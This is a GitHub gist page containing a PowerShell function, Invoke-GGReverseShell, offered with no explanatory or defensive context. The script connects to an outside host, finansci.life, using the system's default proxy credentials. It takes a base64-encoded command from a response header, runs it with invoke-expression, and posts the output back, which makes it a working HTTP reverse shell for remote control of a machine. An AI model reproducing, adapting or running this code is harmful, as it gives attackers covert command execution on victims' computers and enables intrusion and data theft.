Skip to content

Instantly share code, notes, and snippets.

@uceka

uceka/1.ps1

Created November 5, 2019 13:13
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save uceka/5b427684eb29f54cf436dd8537d4d2b9 to your computer and use it in GitHub Desktop.
Save uceka/5b427684eb29f54cf436dd8537d4d2b9 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
1.ps1
function Invoke-GGReverseShell
{
$url = "http://finansci.life/p"
# handle proxies and used default creds if needed
$req = [System.Net.HttpWebRequest]::Create($url);
$proxy=[System.Net.WebRequest]::GetSystemWebProxy();
$proxy.Credentials=[System.Net.CredentialCache]::DefaultCredentials;
$req.proxy = $proxy
# add our header
$req.Headers.add('CMD','INITIAL')
$res = $req.GetResponse();
$x = $res.GetResponseHeader("CMD");
# decode base64
$d = [System.Convert]::FromBase64String($x);
$Ds = [System.Text.Encoding]::UTF8.GetString($d);
# exec whatever we gave it (can be powershell or just shell commands)
$result = invoke-expression $Ds;
$b = [System.Text.Encoding]::UTF8.GetBytes($result);
$hackgg = [System.Convert]::ToBase64String($b);
$res.Close();
$req = [System.Net.HttpWebRequest]::Create($url);
$proxy=[System.Net.WebRequest]::GetSystemWebProxy();
$proxy.Credentials=[System.Net.CredentialCache]::DefaultCredentials;
$req.proxy = $proxy
$req.Method = 'POST';
$Stream = $req.GetRequestStream();
$Stream.Write($b, 0, $b.Length);
$req.GetResponse();
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment